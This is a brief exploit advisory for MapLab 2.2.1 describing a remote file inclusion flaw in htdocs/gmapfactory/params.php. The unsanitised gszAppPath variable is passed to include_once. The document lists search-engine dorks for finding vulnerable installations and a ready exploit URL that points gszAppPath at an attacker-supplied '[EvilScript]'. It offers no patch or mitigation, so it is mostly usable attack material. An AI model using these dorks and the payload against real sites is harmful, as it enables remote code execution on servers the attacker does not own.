Script: MapLab
Version: 2.2.1
Official Site: http://www.maptools.org
Download: http://www.maptools.org/dl/ms4w/maplab_ms4w-2.2.1.zip
–
Bug File: params.php
Path: /htdocs/gmapfactory/params.php
Bug code in line 130:
include_once($gszAppPath."htdocs/gmapfactory/build_phtml.php");
–
Dorks:
index.of /maplab-2.2
intitle:MapLab
index.of /maplab-2.2
index.of /maplab/
–
Exploit:
http://site.com/pathmaplab/htdocs/gmapfactory/params.php?gszAppPath=[EvilScript]